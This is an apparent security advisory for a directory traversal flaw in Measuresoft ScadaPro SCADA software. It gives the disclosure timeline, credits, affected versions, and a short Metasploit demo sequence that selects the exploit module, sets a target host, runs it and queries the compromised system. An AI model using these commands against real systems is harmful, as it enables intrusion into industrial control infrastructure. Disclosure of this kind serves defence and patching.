Timeline :
Vulnerability discovered by Luigi Auriemma
Public release of the vulnerability on 2011-09-13
Metasploit PoC provided on 2011-09-16
PoC provided by:
Luigi Auriemma
mr_me
TecR0c
Reference(s) :
EDB-ID-17848
Affected versions :
All Measuresoft ScadaPro before version 4.0.1
Tested on Windows XP Pro SP3 with :
Measuresoft ScadaPro 3.9.15.0 / 3.1.9
Description :
This module allows remote attackers to execute arbitrary commands on the affected system through a directory traversal attack against the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution.
Metasploit demo :
use exploit/windows/scada/scadapro_cmdexe
set RHOST 192.168.178.78
exploit
getuid
sysinfo